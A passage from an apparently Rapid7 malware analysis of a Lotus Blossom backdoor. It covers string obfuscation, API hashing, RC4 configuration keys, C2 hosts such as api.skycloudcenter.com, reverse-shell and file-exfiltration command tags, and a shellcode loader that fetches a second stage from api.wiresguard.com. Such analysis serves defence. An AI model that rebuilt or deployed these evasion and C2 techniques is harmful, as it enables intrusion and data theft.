</span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>oleaut32.dll</strong></span></span><span style='font-size: undefined;'>, </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>advapi32.dll</strong></span></span><span style='font-size: undefined;'>, </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>shlwapi.dll</strong></span></span><span style='font-size: undefined;'>, </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>user32.dll</strong></span></span><span style='font-size: undefined;'>, </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>wininet.dll</strong></span></span><span style='font-size: undefined;'>,</span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>ole32.dll</strong></span></span><span style='font-size: undefined;'> and </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>shell32.dll</strong></span></span><span style='font-size: undefined;'>.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Names of targeted DLLs are constructed on the run, using two separate subroutines. These two subroutines implement a custom, position-dependent character obfuscation scheme. Each character is transformed using a combination of bit rotations, conditional XOR operations, and index-based arithmetic, ensuring that identical characters encrypt differently depending on their position. The second routine reverses this process at runtime, reconstructing the original plaintext string just before it is used. The purpose of these two functions is not only to conceal strings, but also to intentionally complicate static analysis and hinder signature-based detection.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>After the DLL name is reconstructed, the Main module implements another, more sophisticated API hashing routine.</span></p><h3 style="direction: ltr;">API hashing subroutine</h3><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt47a4d3aa70f2644b/6980beba4551a4a087ba56d2/lotus-blossom-API-hashing-diagram.jpg" alt="lotus-blossom-API-hashing-diagram.jpg" caption="Figure 4: API hashing diagram" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="lotus-blossom-API-hashing-diagram.jpg" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt47a4d3aa70f2644b/6980beba4551a4a087ba56d2/lotus-blossom-API-hashing-diagram.jpg" data-sys-asset-uid="blt47a4d3aa70f2644b" data-sys-asset-filename="lotus-blossom-API-hashing-diagram.jpg" data-sys-asset-contenttype="image/jpeg" data-sys-asset-caption="Figure 4: API hashing diagram" data-sys-asset-alt="lotus-blossom-API-hashing-diagram.jpg" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 4: API hashing diagram</figcaption></div></figure><p style="direction: ltr;">⠀</p><p><span style='font-size: undefined;'>The first difference between this and the API hashing routine used by the loader is that this subroutine accepts only a single argument: the hash of the target API. To obtain the DLL handle, the malware walks the PEB to reach the </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>InMemoryOrderModuleList</strong></span></span><span style='font-size: undefined;'>, then parses each module’s export table, skipping the main executable, until it resolves the desired API. Instead of relying on common hashing algorithms, the routine employs multi-stage arithmetic mixing with constants of </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>MurmurHash-style finalization</strong></span></span><span style='font-size: undefined;'>. API names are processed in 4-byte blocks using multiple rotation and multiplication steps, followed by a final diffusion phase before comparison with the supplied hash. This design significantly complicates static recovery of resolved APIs and reduces the effectiveness of traditional signature-based detection. As a fallback, the resolver supports direct resolution via </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>GetProcAddress</strong></span></span><span style='font-size: undefined;'> if the target hash is not found through the hashing method. The pointer to </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>GetProcAddress</strong></span></span><span style='font-size: undefined;'> is obtained earlier during the “main module preparation” stage.</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blta01bac2b11922a6f/6980bf0473b29a313cc2cac2/lotus-blossom-API-hashing-internals.png" alt="lotus-blossom-API-hashing-internals.png" caption="Figure 5: API hashing internals " class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="lotus-blossom-API-hashing-internals.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blta01bac2b11922a6f/6980bf0473b29a313cc2cac2/lotus-blossom-API-hashing-internals.png" data-sys-asset-uid="blta01bac2b11922a6f" data-sys-asset-filename="lotus-blossom-API-hashing-internals.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 5: API hashing internals" data-sys-asset-alt="lotus-blossom-API-hashing-internals.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 5: API hashing internals</figcaption></div></figure><h3 style="direction: ltr;">Config decryption</h3><p style="direction: ltr;"><span style='font-size: undefined;'>The next step in the malware’s execution is to decrypt the configuration. Encrypted configuration is stored in the </span><span style='font-size: undefined;'><em>BluetoothService</em></span><span style='font-size: undefined;'> file at offset 0x30808 with the size of 0x980. Algorithm for the decryption is </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>RC4</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>with the key </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>qwhvb^435h&*7</strong></span></span><span style='font-size: undefined;'>. This revealed the following information:</span></p><ul><li style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'><strong>Command and Control (C2) url</strong></span></span><span style='font-size: undefined;'>: </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>https://api.skycloudcenter.com/a/chat/s/70521ddf-a2ef-4adf-9cf0-6d8e24aaa821</strong></span></span></li><li style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'><strong>Name of the module</strong></span></span><span style='font-size: undefined;'>: </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>BluetoothService</strong></span></span></li><li style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'><strong>User agent</strong></span></span><span style='font-size: undefined;'>: </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.4044.92 Safari/537.36</strong></span></span></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>The URL structure of the C2 is interesting, especially the section</span><span style='color:rgb(68, 71, 70);font-size: undefined;'> </span><span style='color:rgb(68, 71, 70);font-size: undefined;'><span data-type='inlineCode'>/a/chat/s/{GUID})</span></span><span style='color:rgb(68, 71, 70);font-size: undefined;'>, which appears to be the identical format used by Deepseek API chat endpoints. It looks like the actor is mimicking the traffic to stay below the radar. </span></p><p><span style='font-size: undefined;'>Decrypted configuration doesn’t give much useful information besides the C2. The name of the module is too generic and the user agent belongs to Google Chrome browser. The URL resolves to </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>61.4.102.97</strong></span></span><span style='font-size: undefined;'>, IP address based in</span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>Malaysia</strong></span></span><span style='font-size: undefined;'>. At the time of the writing of this blog, no other file has been seen to communicate with this IP and URL.</span></p><h4 style="direction: ltr;">Persistence and command-line arguments</h4><p style="direction: ltr;"><span style='font-size: undefined;'>To determine the next course of action, malware checks command-line arguments highlighted in Table 1 and chooses one of four potential paths. If the amount of the command-line arguments is greater than two, the process will exit. If there is no additional argument, persistence is set up primarily via service creation or registry as a fall back mechanism.</span></p><p><span style='font-size: undefined;'>See Table 2 below:</span></p><table><colgroup data-width='750'><col style="width:16.971713810316142%"/><col style="width:16.971713810316142%"/><col style="width:66.05657237936772%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'><strong>Argument</strong></span></p></td><td><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'><strong>Mode</strong></span></p></td><td><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'><strong>Action</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'><strong>(None)</strong></span></p></td><td><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>Installation</span></p></td><td><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>Installs persistence (Service or Registry) pointing to binary with </span><span data-type='inlineCode'>-i</span><span style='color:rgb(31, 31, 31);font-size: undefined;'> flag, then terminates.</span></p></td></tr><tr><td><p style="direction: ltr;"><span data-type='inlineCode'><strong>-i</strong></span></p></td><td><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>Launcher</span></p></td><td><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>Spawns a new instance of itself with the </span><span data-type='inlineCode'>-k</span><span style='color:rgb(31, 31, 31);font-size: undefined;'> flag via </span><span data-type='inlineCode'>ShellExecuteA</span><span style='color:rgb(31, 31, 31);font-size: undefined;'>, then terminates.</span></p></td></tr><tr><td><p style="direction: ltr;"><span data-type='inlineCode'><strong>-k</strong></span></p></td><td><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>Payload</span></p></td><td><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>Skips installation checks and executes the main malicious logic (C2 & Shellcode).</span></p></td></tr></tbody></table><p style="direction: ltr;">⠀</p><p><span style='font-size: undefined;'>With the expected arguments present, the malware proceeds to its primary functionality - to gather information about the infected asset and initiate the communication with C2.</span></p><h3 style="direction: ltr;">Information gathering and C2 communication</h3><p style="direction: ltr;"><span style='font-size: undefined;'>A mutex </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>Global\\Jdhfv_1.0.1 </strong></span></span><span style='font-size: undefined;'>is registered to enforce single instance execution on the host. If it already exists, malware is terminated. If the check is clear, information gathering begins by querying for the following: current time, installed AVs, OS version, user name and computer name. Next, computer name, user name, OS version and string </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>1.01</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>are concatenated and the data are hashed using </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>FNV-1A</strong></span></span><span style='font-size: undefined;'>. This value is later turned into its decimal ascii representation and used most likely as a unique identifier of the infected host. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Final buffer uses a dot as delimiter and follows this pattern: </span></p><p>⠀</p><pre language="cpp">&lt;UniqueID&gt;.&lt;ComputerName&gt;.&lt;UserName&gt;.&lt;OSVersion&gt;.&lt;127.0.0.1&gt;.&lt;AVs&gt;.&lt;DateAndTime&gt;</pre><p>⠀</p><p><span style='font-size: undefined;'>The last piece of information added to the beginning of the buffer is a string </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>4Q</strong></span></span><span style='font-size: undefined;'>. The buffer is then </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>RC4</strong></span></span><span style='font-size: undefined;'> encrypted with the key </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>vAuig34%^325hGV</strong></span></span><span style='font-size: undefined;'>.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Following data encryption, the malware establishes an internet connection using previously mentioned user agent and C2 </span><span style='font-size: undefined;'><strong>api.skycloudcenter.com </strong></span><span style='font-size: undefined;'>over port </span><span style='font-size: undefined;'><strong>443</strong></span><span style='font-size: undefined;'>. Data is then transferred via </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>HttpSendRequestA</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>using the </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>POST</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>method. Response from the server is then read to a temporary buffer which is later decrypted using the same key </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>vAuig34%^325hGV</strong></span></span><span style='font-size: undefined;'>.</span></p><h4 style="direction: ltr;">Response and command processing</h4><p style="direction: ltr;"><span style='font-size: undefined;'><em><strong>Note:</strong></em></span><span style='font-size: undefined;'> C2 server was already offline during the initial analysis, preventing recovery of any network data. As a result, and due to the complexity of the malware, parts of the following analysis may contain minor inaccuracies.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The response from the C2 undergoes multiple checks before further processing. First, the HTTP response code is compared against the hardcoded value </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>200</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>(0xC8),</span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>indicating a successful request, followed by a validation of the associated WinInet handle to ensure no error occurred. The malware then verifies the integrity of the received payload and execution proceeds only if at least one valid structure is detected. Next, malware looks into the response data for a small tag to determine what to do next. Tag is used as a condition for a switch statement with 16 possible cases. The default case will simply set up a flag to </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>TRUE</strong></span></span><span style='font-size: undefined;'>. Setting up this flag will result in completely jumping out of the switch. Other switch cases includes following options:</span></p><p>⠀</p><table><tbody><tr><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>Char representation</strong></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>Hex representation</strong></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>Purpose</strong></span></p></td></tr><tr><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>4T</strong></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>0x3454</strong></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>Spawn interactive shell</span></p></td></tr><tr><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>4U</strong></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>0x3455</strong></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>Send ‘OK’ to C2</span></p></td></tr><tr><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>4V</strong></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>0x3456</strong></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>Create process</span></p></td></tr><tr><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>4W</strong></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>0x3457</strong></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>Write file to disk</span></p></td></tr><tr><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>4X</strong></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>0x3458</strong></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>Write chunk to open file</span></p></td></tr><tr><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>4Y</strong></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>0x3459</strong></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>Read & send data</span></p></td></tr><tr><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>4Z</strong></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>0x345A</strong></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>Break from switch</span></p></td></tr><tr><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>4\\</strong></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>0x345C</strong></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>Uninstall / Clean up</span></p></td></tr><tr><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>4]</strong></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>0x345D</strong></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>Sleep</span></p></td></tr><tr><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>4_</strong></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>0x345F</strong></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>Get info about logical drives</span></p></td></tr><tr><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>4`</strong></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>0x3460</strong></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>Enumerate files information</span></p></td></tr><tr><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>4a</strong></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>0x3661</strong></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>Delete file </span></p></td></tr><tr><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>4b</strong></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>0x3662</strong></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>Create directory</span></p></td></tr><tr><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>4c</strong></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>0x3463</strong></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>Get file from C2</span></p></td></tr><tr><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>4d</strong></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><strong>0x3464</strong></span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>Send file to C2</span></p></td></tr></tbody></table><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'><strong>4T</strong></span></span><span style='font-size: undefined;'> - The malware implements a fully interactive </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>cmd.exe reverse shell</strong></span></span><span style='font-size: undefined;'> using redirected pipes. Incoming commands from the C2 are converted from </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>UTF‑8</strong></span></span><span style='font-size: undefined;'> to the system </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>OEM</strong></span></span><span style='font-size: undefined;'> code page before being written to the shell’s standard input, while a dedicated thread continuously reads shell output, converts it from OEM encoding to UTF‑8 using </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>GetOEMCP</strong></span></span><span style='font-size: undefined;'> API, and forwards the result back to the C2.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'><strong>4V</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>- This option allows remote process execution by invoking </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>CreateProcessW</strong></span></span><span style='font-size: undefined;'> on a C2-supplied command line and relaying execution status back to the C2.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'><strong>4W</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>- This option implements a remote file write capability, parsing a structured response containing a destination path and file contents, converting encodings as necessary, </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>writing the data to disk</strong></span></span><span style='font-size: undefined;'>, and </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>returning a formatted status message</strong></span></span><span style='font-size: undefined;'> to the command-and-control server.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'><strong>4X</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>- Similar to the previous switch, it supports a remote file-write capability, allowing the C2 to drop arbitrary files on the victim system by supplying a </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>UTF-8 filename and associated data blob</strong></span></span><span style='font-size: undefined;'>.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'><strong>4Y</strong></span></span><span style='font-size: undefined;'> - Switch implements a remote file-read capability. It opens a specified file with, retrieves its size, reads the entire contents into memory, and </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>transmits the data back to the C2</strong></span></span><span style='font-size: undefined;'>. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'><strong>4\\</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>- The option implements a full </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>self-removal mechanism</strong></span></span><span style='font-size: undefined;'>. It deletes auxiliary payload files, removes persistence artifacts from both the </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>Windows Service registry hive</strong></span></span><span style='font-size: undefined;'> and </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>the Run key</strong></span></span><span style='font-size: undefined;'>, generates and executes a temporary batch file </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>u.bat</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>to delete the running executable after termination, and finally removes the batch script itself. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'><strong>4_</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>- Here malware enumerates information about logical drivers using </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>GetLogicalDriveStringsA</strong></span></span><span style='font-size: undefined;'> and </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>GetDriveTypeA</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>APIs and sends the information back to the C2.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'><strong>4`</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>- This switch option shares similarities with previously analyzed data exfiltration function - </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>4Y</strong></span></span><span style='font-size: undefined;'>. However, its primary purpose differs. Instead of transmitting preexisting data, it </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>enumerates files</strong></span></span><span style='font-size: undefined;'> within a specified directory, </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>collects per-file metadata</strong></span></span><span style='font-size: undefined;'> (timestamps, size, and filename), serializes the results into a custom buffer format, and sends the aggregated listing to the C2.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'><strong>4a - 4b - 4c - 4d</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>- In the last 4 cases, malware implements a custom file transfer protocol over its C2 channel. Commands </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>4a</strong></span></span><span style='font-size: undefined;'> and </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>4b</strong></span></span><span style='font-size: undefined;'> act as control messages used to initialize file </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>download</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>and </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>upload operations</strong></span></span><span style='font-size: undefined;'> respectively, including file paths, offsets, and size validation. Once initialized, the actual data transfer occurs in a chunked fashion using commands </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>4c (download)</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>and </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>4d (upload)</strong></span></span><span style='font-size: undefined;'><strong>.</strong></span><span style='font-size: undefined;'> Each chunk is wrapped in a fixed-size 40-byte response structure, validated for successful HTTP status and correct structure count before processing. Transfers continue until the C2 signals completion via a non-zero termination flag, at which point file handles and buffers are released.</span></p><h3 style="direction: ltr;">Additional artifacts discovered on the infected host</h3><p style="direction: ltr;"><span style='font-size: undefined;'>During the initial forensics analysis of the affected asset, Rapid7’s MDR team observed execution of following command:</span></p><p style="direction: ltr;">⠀</p><pre language="cpp">C:\ProgramData\USOShared\svchost.exe-nostdlib -run
C:\ProgramData\USOShared\conf.c</pre><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>The retrieved folder </span><span style='font-size: undefined;'><em>“USOShared”</em></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>from the infected asset didn’t contain svchost.exe but it contained </span><span style='font-size: undefined;'><em>“libtcc.dll” </em></span><span style='font-size: undefined;'>and </span><span style='font-size: undefined;'><em>“conf.c”</em></span><span style='font-size: undefined;'>. The hash of the binary didn’t match any known legitimate version but the command line arguments and associated </span><span style='font-size: undefined;'><em>“libtcc.dll”</em></span><span style='font-size: undefined;'> suggested that svchost.exe is in fact renamed </span><a href="https://github.com/phoenixthrush/Tiny-C-Compiler"><span style='font-size: undefined;'>Tiny-C-Compiler</span></a><span style='font-size: undefined;'>. To confirm this, we replicated the steps of the attacker successfully loaded </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>shellcode</strong></span></span><span style='font-size: undefined;'> from </span><span style='font-size: undefined;'><em>“conf.c” </em></span><span style='font-size: undefined;'>into the memory of </span><span style='font-size: undefined;'><em>“tcc.exe”</em></span><span style='font-size: undefined;'>, confirming our previous hypothesis.</span><span style='font-size: undefined;'><strong> </strong></span></p><h4 style="direction: ltr;"><strong>Analysis of conf.c</strong></h4><p style="direction: ltr;"><span style='font-size: undefined;'>The C source file contains a fixed size (836) char buffer containing shellcode bytes which is later casted to a function pointer and invoked. The shellcode is consistent with 32-bit version of </span><a href="https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_api.asm"><span style='font-size: undefined;'>Metasploit’s block API.</span></a></p><p style="direction: ltr;"><span style='font-size: undefined;'>The shellcode loads </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>Wininet.dll</strong></span></span><span style='font-size: undefined;'> using </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>LoadLibraryA</strong></span></span><span style='font-size: undefined;'>, resolves Internet-related APIs such as </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>InternetConnectA</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>and </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>HttpSendRequestA</strong></span></span><span style='font-size: undefined;'>, and downloads a file from </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>api.wiresguard.com/users/admin</strong></span></span><span style='font-size: undefined;'>. The file is read into a newly allocated buffer, and execution is then transferred to the start of the 2000-byte second-stage shellcode. </span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt7e5771a2056ea7bb/6980c2dca49b287b588e2770/lotus-blossom-hellcode-decryption-stub.png" alt="lotus-blossom-hellcode-decryption-stub.png" caption="Figure 6: Shellcode decryption stub" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="lotus-blossom-hellcode-decryption-stub.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt7e5771a2056ea7bb/6980c2dca49b287b588e2770/lotus-blossom-hellcode-decryption-stub.png" data-sys-asset-uid="blt7e5771a2056ea7bb" data-sys-asset-filename="lotus-blossom-hellcode-decryption-stub.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 6: Shellcode decryption stub" data-sys-asset-alt="lotus-blossom-hellcode-decryption-stub.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 6: Shellcode decryption stub</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>This stub is responsible for decrypting the next payload layer and transferring execution to it. It uses a </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>rolling XOR-based</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>decryption loop before jumping directly to the decrypted code.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>A quick look into the decrypted buffer revealed an interesting blob with a repeated string </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>CRAZY</strong></span></span><span style='font-size: undefined;'>, hinting at an additional XORed layer, later confirmed by a quick test.</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltfba70f268e1aa776/6980c33229b277724c63dd5f/lotus-blossom-repeated-XOR-key-CRAZY.png" alt="lotus-blossom-repeated-XOR-key-CRAZY.png" caption="Figure 7: Repeated XOR key “CRAZY”" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="lotus-blossom-repeated-XOR-key-CRAZY.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltfba70f268e1aa776/6980c33229b277724c63dd5f/lotus-blossom-repeated-XOR-key-CRAZY.png" data-sys-asset-uid="bltfba70f268e1aa776" data-sys-asset-filename="lotus-blossom-repeated-XOR-key-CRAZY.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 7: Repeated XOR key “CRAZY”" data-sys-asset-alt="lotus-blossom-repeated-XOR-key-CRAZY.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 7: Repeated XOR key “CRAZY”</figcaption></div></figure><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt7fdc600725c456fa/6980c35fe313c672d8909c1a/lotus-blossom-decrypted-configuration.png" alt="lotus-blossom-decrypted-configuration.png" caption="Figure 8: Decrypted configuration" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="lotus-blossom-decrypted-configuration.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt7fdc600725c456fa/6980c35fe313c672d8909c1a/lotus-blossom-decrypted-configuration.png" 